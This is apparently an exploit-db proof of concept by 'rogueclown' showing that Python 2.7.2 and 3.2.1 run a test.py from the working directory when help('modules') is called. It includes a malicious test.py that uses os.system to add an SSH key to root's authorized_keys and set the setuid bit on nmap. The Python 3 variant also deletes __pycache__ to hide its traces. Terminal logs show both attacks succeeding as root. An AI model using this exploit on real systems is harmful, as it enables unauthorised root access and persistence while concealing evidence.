# Exploit Title: Python untrusted search path/code execution vulnerability
# Date: 7.6.12
# Exploit Author: rogueclown
# Vendor Homepage: http://www.python.org
# Software Link: http://www.python.org/getit/releases/
# Version: python 2.7.2 and python 3.2.1
# Tested on: linux (my test machine was OpenSUSE 12.1)
#
# This is an expansion on www.exploit-db.com/exploits/19523/ -- a big thanks,
# and the lion's share of the credit, to ShadowHatesYou (Shadow@SquatThis.net).
# They found the vulnerability; i just found a more generalized application
# of it.
#
# Basically, i found that it's not just python-wrapper that executes a test.py
# script within the current working directory when help('modules') is run --
# python itself does that. In python 2, it works just as ShadowHatesYou showed
# it in his python-wrapper exploit.
#
# This still works in python 3, but you have to do a bit more to cover your
# tracks. In the working directory, python 3 drops a __pycache__ directory
# with a .pyc file inside it. Most of the bytecode in there is not human
# readable, but it displays the shell command called by the script in
# plaintext, making it pretty obvious that something funny happened. However,
# you can get around this by making sure that your test.py script removes the
# __pycache__ directory from the working directory.
#
# rogueclown
# rogueclown@rogueclown.net
# 7.6.12
############
# PYTHON 2 #
############
adalia@bukkit:~/security/pythonwrapper> ls -hl test.py
-rw-r--r-- 1 adalia users 144 Jul 4 15:47 test.py
adalia@bukkit:~/security/pythonwrapper> cat test.py
#!/usr/bin/python
import os
os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap")
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
adalia@bukkit:~/security/pythonwrapper> su
Password:
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
bukkit:/home/adalia/security/pythonwrapper # python
Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')
Please wait a moment while I gather a list of all available modules...
/usr/lib64/python2.7/site-packages/gobject/constants.py:24: Warning: g_boxed_type_register_static: assertion `g_type_from_name (name) == 0' failed
import gobject._gobject
/usr/lib64/python2.7/site-packages/twisted/words/im/__init__.py:8: UserWarning: twisted.im will be undergoing a rewrite at some point in the future.
warnings.warn("twisted.im will be undergoing a rewrite at some point in the future.")
** Message: pygobject_register_sinkfunc is deprecated (GstObject)
Alacarte abc gtkunixprint readline
BaseHTTPServer aifc gzip repr
Bastion antigravity hashlib resource
BeautifulSoup anydbm heapq rexec
BeautifulSoupTests argparse hmac rfc822
CDROM array hotshot rlcompleter
CGIHTTPServer ast hpmudext robotparser
ConfigParser asynchat htmlentitydefs rpm
Cookie asyncore htmllib runpy
Crypto atexit httplib satsolver
DLFCN atk httplib2 scanext
DocXMLRPCServer atom ieee1284 sched
HTMLParser audiodev ihooks scout
IN base64 imaplib select
MimeWriter bdb imghdr serial
OpenSSL beaker imp sets
PAM binascii importlib setuptools
PyQt4 binhex imputil sgmllib
Queue bisect inspect sha
SimpleHTTPServer bsddb io shelve
SimpleXMLRPCServer butterfly itertools shlex
SocketServer bz2 json shutil
StringIO cPickle keyword signal
TYPES cProfile lib2to3 simplejson
UserDict cStringIO libproxy sip
UserList cairo libvboxjxpcom site
UserString calendar libxml2 smbc
VBoxAuth cgi libxml2mod smtpd
VBoxAuthSimple cgitb linecache smtplib
VBoxDD chunk linuxaudiodev sndhdr
VBoxDD2 cmath locale socket
VBoxDDU cmd logging spwd
VBoxDbg code louie sqlite3
VBoxGuestControlSvc codecs macpath sre
VBoxGuestPropSvc codeop macurl2path sre_compile
VBoxHeadless coherence mad sre_constants
VBoxKeyboard collections mailbox sre_parse
VBoxNetDHCP colorsys mailcap ssl
VBoxOGLhostcrutil commands mako stat
VBoxOGLhosterrorspu compileall markupbase statvfs
VBoxOGLrenderspu compiler markupsafe string
VBoxPython contextlib marshal stringold
VBoxPython2_7 cookielib math stringprep
VBoxREM copy md5 strop
VBoxRT copy_reg mhlib struct
VBoxSDL crypt mimetools subprocess
VBoxSharedClipboard csv mimetypes sunau
VBoxSharedCrOpenGL ctypes mimify sunaudio
VBoxSharedFolders cups mmap symbol
VBoxVMM cupsext modulefinder symtable
VBoxXPCOM cupshelpers multifile sys
VBoxXPCOMC curl multiprocessing sysconfig
VirtualBox datetime mutagen syslog
Xlib dbhash mutex tabnanny
_LWPCookieJar dbus mygpoclient tarfile
_MozillaCookieJar dbus_bindings netrc telepathy
__builtin__ decimal new telnetlib
__future__ difflib nis tempfile
_abcoll dircache nntplib termios
_ast dis ntpath textwrap
_bisect distutils nturl2path this
_bsddb doctest numbers thread
_codecs drv_libxml2 numpy threading
_codecs_cn dsextras opcode time
_codecs_hk dumbdbm operator timeit
_codecs_iso2022 dummy_thread optparse toaiff
_codecs_jp dummy_threading os token
_codecs_kr easy_install os2emxpath tokenize
_codecs_tw email ossaudiodev trace
_collections encodings packagekit traceback
_csv errno pango tty
_ctypes exceptions pangocairo twisted
_ctypes_test eyeD3 papyon types
_dbus_bindings fcntl parser unicodedata
_dbus_glib_bindings feedparser pcardext unittest
_elementtree filecmp pdb uno
_functools fileinput pickle unohelper
_hashlib fnmatch pickletools urlgrabber
_heapq formatter pipes urllib
_hotshot fpformat pkg_resources urllib2
_io fractions pkgutil urlparse
_json ftplib platform user
_locale functools plistlib uu
_lsprof future_builtins popen2 uuid
_md5 gc poplib vboxapi
_multibytecodec gdata posix vboxshell
_multiprocessing genericpath posixfile volkeys
_pyio getopt posixpath warnings
_random getpass pprint wave
_satsolver gettext profile weakref
_sha gi pstats webbrowser
_sha256 gio pty whichdb
_sha512 glib pwd wsgiref
_socket glob py_compile xdg
_sqlite3 gmenu pyclbr xdrlib
_sre gnome_sudoku pycurl xml
_ssl gnomekeyring pydoc xmllib
_strptime gobject pydoc_data xmlrpclib
_struct gpod pyexpat xxsubtype
_symtable gpodder pygst zeitgeist
_testcapi grp pygtk zipfile
_threading_local gst pynotify zipimport
_warnings gstoption quopri zlib
_weakref gtk random zope
_weakrefset gtktrayicon re
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
>>> exit()
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
ssh-rsa rogueclown washere
bukkit:/home/adalia/security/pythonwrapper #
############
# PYTHON 3 #
############
adalia@bukkit:~/security/pythonwrapper> ls -hl test.py
-rw-r--r-- 1 adalia users 169 Jul 4 15:51 test.py
adalia@bukkit:~/security/pythonwrapper> cat test.py
#!/usr/bin/python
import os
os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap; /bin/rm -rf __pycache__")
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
adalia@bukkit:~/security/pythonwrapper> su
Password:
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
bukkit:/home/adalia/security/pythonwrapper # python3
Python 3.2.1 (default, Jul 18 2011, 16:24:40) [GCC] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')
Please wait a moment while I gather a list of all available modules...
CDROM binascii inspect shelve
DLFCN binhex io shlex
IN bisect itertools shutil
TYPES builtins json signal
__future__ bz2 keyword site
_abcoll cProfile linecache smtpd
_ast calendar locale smtplib
_bisect cgi logging sndhdr
_codecs cgitb macpath socket
_codecs_cn chunk macurl2path socketserver
_codecs_hk cmath mailbox spwd
_codecs_iso2022 cmd mailcap sqlite3
_codecs_jp code marshal sre_compile
_codecs_kr codecs math sre_constants
_codecs_tw codeop mimetypes sre_parse
_collections collections mmap ssl
_compat_pickle colorsys modulefinder stat
_csv compileall multiprocessing string
_ctypes concurrent netrc stringprep
_datetime configparser nis struct
_dummy_thread contextlib nntplib subprocess
_elementtree copy ntpath sunau
_functools copyreg nturl2path symbol
_hashlib crypt numbers symtable
_heapq csv opcode sys
_io ctypes operator sysconfig
_json datetime optparse syslog
_locale decimal os tabnanny
_lsprof difflib os2emxpath tarfile
_markupbase dis ossaudiodev telnetlib
_multibytecodec distutils parser tempfile
_multiprocessing doctest pdb termios
_pickle dummy_threading pickle textwrap
_posixsubprocess email pickletools this
_pyio encodings pipes threading
_random errno pkgutil time
_socket fcntl platform timeit
_sqlite3 filecmp plistlib token
_sre fileinput poplib tokenize
_ssl fnmatch posix trace
_string formatter posixpath traceback
_strptime fractions pprint tty
_struct ftplib profile turtle
_symtable functools pstats types
_thread gc pty unicodedata
_threading_local genericpath pwd unittest
_warnings getopt py_compile urllib
_weakref getpass pyclbr uu
_weakrefset gettext pydoc uuid
abc glob pydoc_data warnings
aifc grp queue wave
antigravity gzip quopri weakref
argparse hashlib random webbrowser
array heapq re wsgiref
ast hmac readline xdrlib
asynchat html reprlib xxlimited
asyncore http resource xxsubtype
atexit imaplib rlcompleter zipfile
audioop imghdr runpy zipimport
base64 imp sched zlib
bdb importlib select
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
>>> exit()
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
ssh-rsa rogueclown washere
bukkit:/home/adalia/security/pythonwrapper # ls __pycache__
ls: cannot access __pycache__: No such file or directory
bukkit:/home/adalia/security/pythonwrapper #